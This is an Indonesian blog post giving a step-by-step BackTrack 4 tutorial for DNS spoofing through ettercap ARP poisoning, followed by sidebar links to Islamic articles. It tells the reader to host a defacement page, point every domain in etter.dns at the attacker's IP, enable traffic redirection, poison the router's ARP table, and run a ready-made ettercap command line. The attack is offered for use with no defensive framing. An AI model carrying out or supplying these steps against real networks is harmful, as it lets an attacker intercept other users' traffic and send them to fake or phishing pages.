BackTrack 4 Man In The Middle Attack DNS Spoofing
DNS spoof adlah membajak permintaan dari client untuk resolve nama domain sehingga Attacker bisa bebas mereply secara palsu request dari client.
bisa dibayangkann
lets do it.
open ettercap-ng GUI mode
1. Unified Sniffing (CTRL + U) IP -> 192.168.1.254
piluh card interface atau biasanya untuk wireless ialah wlan0
2. aktifkan httpd atau apache
root@bt:~# sh -c “start-apache”
edit /var/www/index.html dengan halaman deface semau kita.
# kate /var/www/index.html
3. edit etter.dns
root@bt:~# cd /usr/share/ettercap/
root@bt:/usr/share/ettercap# cp etter.dns etter.dns.old
root@bt:/usr/share/ettercap# kate etter.dns
hapus semua field tulis
* A IP-ATTACKER
4. uncomment ip table ettercap-ng
root@bt:~# kate /etc/etter.conf
uncomment 2 baris, redir_command_on dengan redir_command_off
sehingga menjadi:
save lalu close
5. aktifkan plugin dns_spoof di ettercap (CTRL + P).
aktifkan dengan mengklik 2x.
6. scan hosts list (CTRL + S).
7. add target list (add hanya ip router saja) (CTRL + T).
isi target 1 dengan ip router (/192.168.1.1/)untuk target 2 kosongkan ip agar semua request ip bisa di spoof kita hanya konsen di ip router saja.
8. aktifkan MITM attack ARP Poisoning (Mitm -> Arp Poisoning).
hanya pilih “Sniff remote connections.” klik OK
8.start sniffing happy ending 😉 (CTRL + W).
9. ingin mode text? konsole?
root@bt:~# ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.1.1/ //
Good Luck!
http://ray16.info/~me/?p=202
Radio Syiar Sunnah
Cs 1
Cs 2
Unknown Feed
- An error has occurred; the feed is probably down. Try again later.
Qur’an dan Sunnah
- POLIGAMI BUKAN SUNNAH, TETAPI HUKUMNYA JAIZ (BOLEH) 12 July 2010
- Bolehkah Wanita Haidh Masuk ke Masjid ? 21 June 2010
- MENGATASI KONDISI PERPECAHAN UMMAT ISLAM 14 June 2010
Unknown Feed
- An error has occurred; the feed is probably down. Try again later.
Unknown Feed
- An error has occurred; the feed is probably down. Try again later.
Visitor
Who are you
